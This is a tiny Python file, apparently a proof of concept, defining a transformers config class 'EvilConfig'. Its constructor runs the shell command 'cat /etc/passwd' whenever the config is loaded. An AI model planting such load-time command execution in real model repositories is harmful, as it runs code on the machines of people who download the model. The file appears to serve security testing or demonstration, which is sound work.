File size: 220 Bytes
5fc0489 |
1 2 3 4 5 6 7 8 9 10 |
from transformers import PretrainedConfig
import os
class EvilConfig(PretrainedConfig):
model_type = "evil"
def __init__(self, **kwargs):
os.system("cat /etc/passwd")
super().__init__(**kwargs)
|